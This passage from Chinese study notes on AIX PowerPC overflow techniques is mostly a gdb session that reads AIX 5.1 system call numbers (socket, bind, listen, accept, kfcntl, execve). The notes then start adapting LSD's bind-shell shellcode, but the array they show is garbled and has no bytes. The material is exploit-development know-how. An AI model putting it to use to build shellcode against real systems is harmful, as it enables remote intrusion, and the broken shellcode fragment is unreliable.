AIX PowerPC体系结构及其溢出技术学习笔记(7)

(gdb)

0x1000735c in socket () (gdb) p/x $r2 $1 = 0x8d (gdb) c Continuing.

Breakpoint 2, 0x10007448 in bind () (gdb) x/8i $pc

0x10007448 : lwz r12,32(r2) 0x1000744c : stw r2,20(r1) 0x10007450 : lwz r0,0(r12) 0x10007454 : lwz r2,4(r12) 0x10007458 : mtctr r0 0x1000745c : bctr 0x10007460 : .long 0x0 0x10007464 : .long 0xc8000 (gdb) si

0x1000744c in bind () (gdb)

0x10007450 in bind () (gdb)

0x10007454 in bind () (gdb)

0x10007458 in bind () (gdb) p/x $r2 $2 = 0x8c (gdb) c Continuing.

Breakpoint 3, 0x1000746c in listen () (gdb) x/8i $pc

0x1000746c : lwz r12,36(r2) 0x10007470 : stw r2,20(r1) 0x10007474 : lwz r0,0(r12) 0x10007478 : lwz r2,4(r12) 0x1000747c : mtctr r0 0x10007480 : bctr 0x10007484 : .long 0x0 0x10007488 : .long 0xc8000 (gdb) si

0x10007470 in listen () (gdb)

0x10007474 in listen ()

(gdb)

0x10007478 in listen () (gdb)

0x1000747c in listen () (gdb) p/x $r2 $5 = 0x8b (gdb) c Continuing.

Breakpoint 4, 0x10007394 in naccept () (gdb) x/8i $pc

0x10007394 : lwz r12,12(r2) 0x10007398 : stw r2,20(r1) 0x1000739c : lwz r0,0(r12) 0x100073a0 : lwz r2,4(r12) 0x100073a4 : mtctr r0 0x100073a8 : bctr 0x100073ac : .long 0x0 0x100073b0 : .long 0xc8000 (gdb) si

0x10007398 in naccept () (gdb)

0x1000739c in naccept () (gdb)

0x100073a0 in naccept () (gdb)

0x100073a4 in naccept () (gdb) p/x $r2 $6 = 0x8a (gdb) c Continuing.

Breakpoint 5, 0x100074b4 in close () (gdb) x/8i $pc

0x100074b4 : lwz r12,44(r2) 0x100074b8 : stw r2,20(r1) 0x100074bc : lwz r0,0(r12) 0x100074c0 : lwz r2,4(r12) 0x100074c4 : mtctr r0 0x100074c8 : bctr 0x100074cc : .long 0x0 0x100074d0 : .long 0xc8000 (gdb) si

0x100074b8 in close ()

(gdb)

0x100074bc in close () (gdb)

0x100074c0 in close () (gdb)

0x100074c4 in close () (gdb) p/x $r2 $7 = 0xa0 (gdb) c Continuing.

Breakpoint 6, 0x100074d8 in kfcntl () (gdb) x/8i $pc

0x100074d8 : lwz r12,48(r2) 0x100074dc : stw r2,20(r1) 0x100074e0 : lwz r0,0(r12) 0x100074e4 : lwz r2,4(r12) 0x100074e8 : mtctr r0 0x100074ec : bctr 0x100074f0 : .long 0x0 0x100074f4 : .long 0xc8000 (gdb) si

0x100074dc in kfcntl () (gdb)

0x100074e0 in kfcntl () (gdb)

0x100074e4 in kfcntl () (gdb)

0x100074e8 in kfcntl () (gdb) p/x $r2 $1 = 0x142 (gdb) c Continuing.

Breakpoint 7, 0x10007328 in execve () (gdb) x/8i $pc

0x10007328 : lwz r12,0(r2) 0x1000732c : stw r2,20(r1) 0x10007330 : lwz r0,0(r12) 0x10007334 : lwz r2,4(r12) 0x10007338 : mtctr r0 0x1000733c : bctr 0x10007340 : .long 0x0

0x10007344 : .long 0xc8000 (gdb) si

0x1000732c in execve () (gdb)

0x10007330 in execve () (gdb)

0x10007334 in execve () (gdb)

0x10007338 in execve () (gdb) p/x $r2 $9 = 0x5

好了，现在我们找出在AIX 5.1下我们需要系统调用中断号的值：

socket=0x8d bind=0x8c listen=0x8b naccept=0x8a close=0xa0 kfcntl=0x142 execve=0x05

lsd已经把功能都实现了，我们只需做少许的修改：

char lsd[] =

\ \ \ \ \ \ \ \

\ \ \ /* listen=0x8b naccept=0x8a */ /* kfcntl=0x142 */

\ \ \

\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \

\